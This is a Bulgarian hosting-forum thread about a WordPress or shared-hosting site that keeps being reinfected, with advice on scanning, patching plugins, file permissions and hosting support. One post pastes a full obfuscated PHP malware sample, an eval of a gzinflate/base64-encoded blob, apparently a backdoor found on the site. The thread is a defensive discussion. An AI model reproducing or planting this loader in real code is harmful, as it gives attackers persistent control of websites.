Проблем с едно хакерче ахахх

[Андрей Ефтимов]

Има дупка по сайт или сайтовете на хостинга в някой модул/плъгин и от там пробиват и си създават файловете отново и отново. Трябва да се намери къде е дупката по кода, иначе ще си създава файловете така и ти ще си ги триеш до безкрай.

Този тип вируси станаха известни през предходната година, автоматични са и проверяват дали е закрита "дупката" в кода и ако не е, отново пишат по файловете и създават злонамерен код.

 

[Test]

Такова нещо изчистих успешно преди няколко дни чрез 2-3 сканирания с Wordfence при включена опция да сканира и извън папката на Wordpress, тоест, навсякъде където има права да пипа. След сканирането дава кои файлове са заразени и кои излишни. Излишните се трият, а заразените се чистят. Лесно се познава зловредната част от кода.

 

[partytime]

<?php function lzjqzG($OPjypj){$OPjypj=gzinflate(base64_decode($OPjypj));for($i=0;$i<strlen($OPjypj);$i++) {$OPjypj[$i] = chr(ord($OPjypj[$i])-1);}return $OPjypj;}$L7CRgr = "e0ec551b204b0d93bfa1d8dc2bcbbf8d";eval(lzjqzG("7Vp7c9pIEv8AfIqJwkZwC0jYxMnaQB42TlLr2D5Mrmov5KixNIDKQtJKQ7Dj9X717Z4ZoQdCtpOt/euc2Hr0c3p+3dMzMF16Fnd8j7w7rFVp/ba6DF3SI1EQOh6f1vSfolc0cHo/Rc+ohX8Dyud45fBHb5Aqhd/JcPDvT4OL0WcdWPUv2TdW7gUqyL3i+pf6Aalavs3A9Oup47LJjPGJ5XuceTyqoVPA4UxJTXH1yJS6EauTW5Cbg5QFLBPHc3gNGMVDxLgfcBCYN8jhp+HJ2floAhewLLVtZ7oYDN+8G5yOGkR3Xb2MdTgYfRqejoZvTi+OB8MGaZcxjz58HJx9Aq1t0yzjOx4OLt5PDs9OTweHwD0afhqUsV9cnEz+Mxh+OP7tfIA+mKlYCiF2zSwUiZVYrh8x9eIuZHwZelLg4A4j7ERgpZabwjp59oxsUORcFtMEFIpJON9y5qSXAD19znkQ7RuG1Vo5X3dblr8wdDHltSeCDZBZyO2nuO+qHmM2sOhdvaW/gt9gHugSNxEPAz+S8AEIIGMdYJTCke2wmg6wgzcAQBut35GqAKNHF2iZLwJ8RIRNV6HDIYhrckOOBmNPMX94yOhCoHjBOJ3YlNMUd/1A3mMAgbtKP+vLEOIlB1yQAGvuOgQiLaq3LBihfLMslFh7dvc6ZL8vnZCl1YGswkPKuddLz3W8qwwfhgdDUinEiD3hzoLhvKpA3jb7eqt68uJwOAtberd5J+JZqQY0ioiK+kFG1+HZ2a8fBgiqKFIAgWAs7OebNMx/pVvgSCnl4ZLhpN0RBtqFfKL+/EwidlN5hpJTDbKW71/BiDRk0LBuZfgPCqxnYyTZXX/mL7nKiPxLkG4XW/OWrhvbiKMm9G9OQbCy23u7yoIcWQEtM7wKgR+B10sasb3OxGYIlVpIV1Ao1EMNbpknbpOXKd3fvn3DiMLPgdSnkjCrUjs/+mVF37/paYotnZS0OCOFZ1Jdi5y/P58Mzk7grkoxBLGOjTgoFMZpOAlZ4FILXEZFDaLhHFKM6SWmD9NbOUftxQCcbOmujjy4KCbYF+N7REmgcUxU5kEuhXQRPaRACLkkY7MKVLlQXAUZXJ6tdMnnkyt2k+RrjAkEMIo8EYhTafJkQ8HzHVNl0ZxRm4U17f1odG60W23SMTvk1Ofk2F96Nkw2ka5ATlpzHyrz1A8XhIqeo6c91QiMfu7bPQ2AwLV+1/GgjBF+E7CeyIGVH9oawUHJZ430SYYpWl4uHK6Rr9RdJo/9roGG+npsH0JRqTzehblj28yLHZD5urbV1sp9UewpX5QDT47ODkewXJP3o48n/Uo3vgzeHMEFSy+Zh2za0zQSMhf08huXRXPGQLe0xNk1NywIB/Bzh7us/xGaH3IxZ67bNeSbSlfI9SuXvn1zW5nC0tCc0oXj3uwTbUgtx5uRC+pF5MxjkBTQG0TOVyjKl9S6moU4fU3Ld/1wnzxle/jvoIJmm9Gc2v5q3wyuCf624ffpi+f476ByV3mqliCoh/tz/ysLb4sU7u3u7eztblGIf55Op9OMutbUCSNepCxyXDBTwLzdfizygPFweuky0AE4ZCApqKb4IbbPObOR6X17I743mZjeVehtJR48yCrTWHNCikDcJ57vScbY7ZhdRKI0UCpWAoqNiLnM4g0UoFBjil2PfNcBz5sL/1tT0pshtZ1ltE+eB9dAWLHLK4fnaIJU8Oqu0jUU1rqGQvHbs6PfENPtfteCKWEhJNZiRqLQgqxS7VvUuoF3on1zfzccY8GimcEWPndgIqMXRvuX1syZaka/QhJ4kx/S0zVibwxwDZIHp5esHBu2NdoL09SIHF9Pg1sLzAXUtiFTetqufI4CkTmY/YS6zgxKiNQoUhH0crt/BJX6ivuhQ/aJ6D/XJfjdIGmb66JzkQ1gmgC1CvuXhAqLhLWya7IhVe/SK5s+HusN3dAbVdXSiSuuMuw6cHFRSxOhFjFqzWuKiUak6ti9Pj7WRbnHO+wTdF30Ko6ND2a8pMo2RxUyqurUK7EtNLS+0TUoFjpMRMeTDVFGZT1FKlSiCw9rVadnHlSdbg/sw/Xnn8G+4Nek35+rzhdNhLbqkCc9dLOuGAwNrUrlGnahIAAtKDhm6AkFqqQNIBAzJmdNP0hNVNzkwUJpQbw4k+sdcLxeXNlOKMPXgsBiR1LMfrteb6AkiWzuabOQwXrSl0wkWloWg+5x/19E+lmqEQeBuvrdy5AY4K/ESYGVkNlrG3I7890m7lJBOf5wMrj4rGOfIfELNMsPbvIk2OItAtGJwE5/bbO1wSU56vHUFkbqGHjJCArOJ4AyFePIuRiny7Y4KMEZnVG3QS5YCNXVu6Hkil3laonYUU5pBF34IqDeTctj3KA4+Am6HBlNY8dsd4x2G/93jjupspJziWQbHmig5cK9WLrcgSaOi56giW1f0oDghEAZUQ6Lke9nOwx0I+5G5D1YL+tBlkKXZJNtSCVB/rpgfYeThxJd51iOck7i0pP0bGt03etrmk36GruKyblRRsWUhFYKQFo8nsNlGGIfoEKoqVqTFzxIakG4toULQjKRyFDTu0HIoJLM+QLqP7Mc6lpzGka1gp36hm+YUkK8rpCaH4cfYAOQ2xrCS9gXQmHTbVjPITWTJMm4GC+umF1JPotElvR4IFgpM7qxHFvzhW/rMpFzlY+FiyTHka2WNdDwLW7jwVJOoDSZD+fUmwFogBfM4bHjEXQ9rUcm9KaWQRj6Yeu+JMwhOCW/BrACLVC0DJgj5xvcd9ZQ1VuAXViDa8lBqa83xDkMCke5YNXrDdLsABQ2cyC7w0D2lJH8nGqlwjCvSS7hlGnl+fbOT+eansBzEyiQTViri5DisVVSx4EqWfNoSa8CBXL3QuYU99s/ABYhvw0ma5eEP6Ify/l4UA6lU7aSFnJAUvJFWNoxC+ZZGvsHYSIn6+/DCbMdXoiSdaGuTgM8//MD5uUxoq/Uke/6KCVobMhvR8oAbMuKjzghf07+91isJBoEUkDFnwVoWR+3BPV7YNGNN2FoJeq9NEnor6LejqlmAgalPXRZyZYTXFRi5cq3fwQvOL+PRst64YrXqvxEFK9omyt+yUrZy6yUKWyijzHdCRUxXIgWPhfUMnAdCd0EdnbfVYVS4lvXqlxSpRwX/bL0PD6Zf7zr68z4Tt+TvChcaItmuRpZ1INI435V3tXiXahitp2vBHafmgK61v/bN+TEcvHsXBMnQuKVvYYYluzUgQBQMuQLKNQl5KR/iEq4zgRmNziw49RTm/E4Urgdh2s9PnidYNDkntdAglYnf/whWAQyWnr2sbW5wRZNsXRJ7bTHaqudaB1rfbzgHnlzBM1myfA0laUTLNk4dVln6yW4xO5aQh7HCXGwHygvUBmfpsp2KyNU7hIG7AEGJcT1dRC3hyBT+sei9o+1+HwZYi2r1rMk5GOEoTymkyV2jDVWvJW8qpSOtTEeHst3m0RZ7sZxgm5nFL3gGFshuG5nk70A8A3FTYrRkM5m6/5YLRNjLR4Evh5riX8CV/fISJNrmeqDhGQQE6E0jnOicnFKMffH2Q3mZlqmjo8260c33pCW3ZQlN9byJLvFh0fxAMSGvp5O4Cr2itgu4XYSbnOsRtvc6SRc4oi7Jp4auzILJKnfI8iJ3dcmq1DS2IGWgnx8m6wGMae4Au3Xt8lSXlhS1Ja3l/Iwi3nxqrjEaC1pRvuuShPH7btLTYmCklojpe7xamu1ydn8f7nZyog951g250U16XFFCcP++Kr0MKnislQs+4N1SXXMQIAOKtNkx3KiN/svCzGS6Q9PCrKj3TLjji42C4rVBziG+HASq1n8TTF1wKEKWVU8qhqVJsnv3dQU/Rkxrw9N0xTfQIhvQdrxpj5+Dh/JMYgkzUq9SaTe5KXcrVIvE6mXeanmVqm9RGovL3W5VaqTSHXyUvZWqZ1EaicvZW2VaidS7bxUsJZKv13KIw7x2OpltZn4VTTyiuihjh9VNXH/vYXTfCk5V/dzdgRn9uVLZSgS4tc6qcO1mOUitlBiYufBbrcf7Lb5ctPtzv1udx7httl5qNvmzoPdbm+6vaN84tvdjllGKbfjLwOiJQDNXw==")T);?>

Тази функция "eval" може ли да се промени по някакъв начин ?

 

[EASYSURVIVOR]

Тази функция "eval" може ли да се промени по някакъв начин ?

незнам намерих 2 файл дълбоко скрито сред файловете и проблема изчезна

 

[s1yf0x]

незнам намерих 2 файл дълбоко скрито сред файловете и проблема изчезна

@Blinky , сега разбираш ли, колко е безмислено да се отделя време да помагаш в такива теми. Нито е разбрал, как са се появили файловете, нито да предприеме някакви корективни и превантивни действия, за да не се появят отново, нито пък е прегледал всички директории дали са с привилегии 755 или всички файлове дали са - 644, че за някои и 400 по възможност. После задната спирачка от Балканче ще изръси поредния акъл, да си смени ризата, ако го стягат чорапите.

 

[Blinky]

@s1yf0x , май предвид, че по-добре тук, отколкото на тикет в някой хостинг провайдър, защото там ще го карат да сканва, да рови и да му дадат някакъв ултиматум да вземе действия преди да зарази целия си акаунт. А и ако не се разчита на такива дето трият по цял ден такива неща, на кой тогава.

В крайна сметка как са се появили? Стана ли ясно? Ъпдейтвай до последно и няма да е зле да се ресетнат паролите за всеки случай, че не искам да вкарам някаква параноя, но все пак след това може да се направи.

 

[EASYSURVIVOR]

@s1yf0x , май предвид, че по-добре тук, отколкото на тикет в някой хостинг провайдър, защото там ще го карат да сканва, да рови и да му дадат някакъв ултиматум да вземе действия преди да зарази целия си акаунт. А и ако не се разчита на такива дето трият по цял ден такива неща, на кой тогава.

В крайна сметка как са се появили? Стана ли ясно? Ъпдейтвай до последно и няма да е зле да се ресетнат паролите за всеки случай, че не искам да вкарам някаква параноя, но все пак след това може да се направи.

Нека господина горе да разкодира кода горе като толкова е добър да покаже, щото вместо да соли можеше да дава съвети какво да се направи аз не съм някъв сървър админ и не ги разбирам нещата не ми е и това работата.. ако ги знаех , щях да си взема сървър директно и да се държа на шаред хостинг, само заради съпорта съм на шаред..
ICN решаваха такива проблеми каквито и да са за няколко минути без нищо.. бяха много много добри жалко че си продадоха хостинга..

 

[contra]

@Blinky , сега разбираш ли, колко е безмислено да се отделя време да помагаш в такива теми. Нито е разбрал, как са се появили файловете, нито да предприеме някакви корективни и превантивни действия, за да не се появят отново, нито пък е прегледал всички директории дали са с привилегии 755 или всички файлове дали са - 644, че за някои и 400 по възможност. После задната спирачка от Балканче ще изръси поредния акъл, да си смени ризата, ако го стягат чорапите.

Ама ти искаш незабавно признание.
То не става тъй. Ще почакаме, ше се индексира страницата, ше надойдат хора, ще прочетат чалъма ти...

Хакнати юзъри ще пият по 1 за здравето ти години наред!

 

[s1yf0x]

Нека господина горе да разкодира кода горе като толкова е добър да покаже, щото вместо да соли можеше да дава съвети какво да се направи аз не съм някъв сървър админ и не ги разбирам нещата не ми е и това работата.. ако ги знаех , щях да си взема сървър директно и да се държа на шаред хостинг, само заради съпорта съм на шаред..
ICN решаваха такива проблеми каквито и да са за няколко минути без нищо.. бяха много много добри жалко че си продадоха хостинга..

С какво дехеширането на фукнцията по-горе ще ти помогне да разбереш как са те ударили ?!? Съвети ти дадох точно толкова, колкто е нужно и на току що започнал support, който ползва ssh и linux от месец да се справи с проблема. Но ти пак не разбираш какъв е и защо е необходимо да се бориш с него по различен начин.

 

[EASYSURVIVOR]

С какво дехеширането на фукнцията по-горе ще ти помогне да разбереш как са те ударили ?!? Съвети ти дадох точно толкова, колкто е нужно и на току що започнал support, който ползва ssh и linux от месец да се справи с проблема. Но ти пак не разбираш какъв е и защо е необходимо да се бориш с него по различен начин.

Декодиране ще ми помогне с кои файлове и как е свързан .. т.н. файловете са сложени още 2021 година и са седяли без да правят нищо до преди 10 дена което незнам как може да се проследи

 

[s1yf0x]

Декодиране ще ми помогне с кои файлове и как е свързан .. т.н. файловете са сложени още 2021 година и са седяли без да правят нищо до преди 10 дена което незнам как може да се проследи

Нито пише вътре с кои файлове в свързан, нито как се е появил този код в тях. А дали са от 2021-ва година няма как да си сигурен. Във всеки хакнат акаунт има файлове от 1977-та година, но реално нито са се появили там тогава, нито са редактирани последно в същата година.

 

[EASYSURVIVOR]

Нито пише вътре с кои файлове в свързан, нито как се е появил този код в тях. А дали са от 2021-ва година няма как да си сигурен. Във всеки хакнат акаунт има файлове от 1977-та година, но реално нито са се появили там тогава, нито са редактирани последно в същата година.

еми човек добре , до тук свършват моите правомощия аз ако знам как да следя тези работи нямаше да правя това което правя , щях да управлявам сървърите.. те хората от хостинга не могат да се справят с проблема дето това им е работат.а..

 

[$INeed$]

еми човек добре , до тук свършват моите правомощия аз ако знам как да следя тези работи нямаше да правя това което правя , щях да управлявам сървърите.. те хората от хостинга не могат да се справят с проблема дето това им е работат.а..

Нещо много си се объркал, човече. Хората от хостинга имат една единствена задача, всичко друго са извратени желания на клиентите, на които се поддават, защото са мизерници в повечето случаи. И това е да предоставят работеща хостинг услуга за системите, които ще държат. Настройки, пробиви, бъгове и други шитни по системите си е изцяло в полето на клиента. Не знам къде се хостваш, но аз лично бих те изгонил, ако ми се налага да те чисят по няколко пъти на година, и си ми кацнал на шер план за без пари.

 

[EASYSURVIVOR]

Нещо много си се объркал, човече. Хората от хостинга имат една единствена задача, всичко друго са извратени желания на клиентите, на които се поддават, защото са мизерници в повечето случаи. И това е да предоставят работеща хостинг услуга за системите, които ще държат. Настройки, пробиви, бъгове и други шитни по системите си е изцяло в полето на клиента. Не знам къде се хостваш, но аз лично бих те изгонил, ако ми се налага да те чисят по няколко пъти на година, и си ми кацнал на шер план за без пари.

Ми да не трябва да ги занимаваш за щяло и нещяло това е ясно, но пък аз как 10 години в ИЦН нямах проблем и след като закриха и се преместих и изведнъж бам вирусче в хостинга на неймчипа.. в нет-а е пълно че има много такива с хостинг в неймчим и имат вирусчета.. значи може би вируса е от тях не е от мен.. това е тяхна работа да си чистят сървърите от вирусчетата.. за кво им плащам ако няма да ми вършат тези работи.. за какво ми е този съпорт тогава.. примерно искам да направя ресторе на някаква база данни и ми дава някаква грешка.. аз тази грешка как да оправявм как нямам пълни права да влезна вътре и да гледам проблемите? и ми казват че не могат да си свалят бекъпа от там и да си го сваля и да им пратя по емайл 7 ГБ :Д

 

[TheCrazyBastard]

Ми да не трябва да ги занимаваш за щяло и нещяло това е ясно, но пък аз как 10 години в ИЦН нямах проблем и след като закриха и се преместих и изведнъж бам вирусче в хостинга на неймчипа.. в нет-а е пълно че има много такива с хостинг в неймчим и имат вирусчета.. значи може би вируса е от тях не е от мен.. това е тяхна работа да си чистят сървърите от вирусчетата.. за кво им плащам ако няма да ми вършат тези работи.. за какво ми е този съпорт тогава.. примерно искам да направя ресторе на някаква база данни и ми дава някаква грешка.. аз тази грешка как да оправявм как нямам пълни права да влезна вътре и да гледам проблемите? и ми казват че не могат да си свалят бекъпа от там и да си го сваля и да им пратя по емайл 7 ГБ :Д

Аз сменях различни БГ хостинги през последните над 10 години и като цяло смея да твърдя, че както хората са различни, така и техните услуги. Не визирам, че в повечето случаи съм работил предимно с българи, но дали е компания с име зад гърба си или частно лице е все тая - когато нямат доблестта да бъдат честни и целят единствено печалба - са способни да прекрачат определени граници.

Случвало ми се е примерно от самият хостинг, на който съм да ми добавят крон задачи за сканиране на сигурността и пробиви с опит за хакване, т.е. да речем с добрите си намерения да "съборят" някой сайт, а същевременно да ме изнудват, че съм превишавал процесорното им време. Естествено след като доказах, че това се случва от тях самите, се здрависахме по живо и здраво.
Нищо чудно и да добавят по някоя "задна вратичка" за всеки си случай, щом си позволяват и това...

Сигурността на хостинга като цяло е хубаво да бъде под мониторинг. Не бива обаче тази услуга, която предварително е калкулирана или не, да оказва негативно влияние върху цялостно изпървоначално качество на услугата...

Колкото до самият казус с "пролуката" в НЕ wp сайт..., но друга, да речем сходна платформа.
- Основният принцип е обновяване до последна версия на самата платформа и всички прилежащи използвани или не добавки.
- Когато горното се направи, няма значение как се е появила пролуката, защото за най-обикновеният потребител това е достатъчно да бъде защитен, ако разбира се разчита на безплатните теми и добавки от основния източник за такива, или за платени многофункционални, но доказани във времето.
- Когато е възможно "декриптирането" на злонамерен код, е добре да се анализира "дълбоко" и извлече максимум ползва за противодейстие в бъдеще време. Обикновеният потребител няма как да бъде свидетел на това, или да го разбере в същото време.

 

[$INeed$]

Ми да не трябва да ги занимаваш за щяло и нещяло това е ясно, но пък аз как 10 години в ИЦН нямах проблем и след като закриха и се преместих и изведнъж бам вирусче в хостинга на неймчипа.. в нет-а е пълно че има много такива с хостинг в неймчим и имат вирусчета.. значи може би вируса е от тях не е от мен.. това е тяхна работа да си чистят сървърите от вирусчетата.. за кво им плащам ако няма да ми вършат тези работи.. за какво ми е този съпорт тогава.. примерно искам да направя ресторе на някаква база данни и ми дава някаква грешка.. аз тази грешка как да оправявм как нямам пълни права да влезна вътре и да гледам проблемите? и ми казват че не могат да си свалят бекъпа от там и да си го сваля и да им пратя по емайл 7 ГБ :Д

Ти пак най-големите издънки си си избрал, може би след godaddy и hostgator. Какво точно очакваш да се случи там?

Пак ти казвам, много си се объркал. Плащаш им за хардуера, софтуера, сетъпа, който са направили, за да ти вървят бъгавините, и съпорт, ако има проблем с нещо от изброените. Всичко друго си е при теб. Имат мониторинг до момента, в който не те пробиват, защото нещо не е наред при теб. И на каква точно цена мислиш, че трябва да ти подават плана, че да има един да чисти постоянно?

Виж какви антивирусни софтове имаш в контолния панел, настрой си ги, има и плъгини за тази цел. За всичко останало - хостингът, който си избрал е греда. Трябва ти пълен достъп до базата, щом си с пълни права над хостинг плана си, както и това с бекъпа е пълна олигофрения. За тези неща не споря.

 

[Test]

Цената човек, който нищо не разбира или не му се занимава със сигурност да няма проблеми е 1000 лв. на година. Заслужава си ако с това си изкарваш хляба.

 

[contra]

Хаквали са ми 2 сайта с активен Wordfence (безплатната версия).
Неколкократно.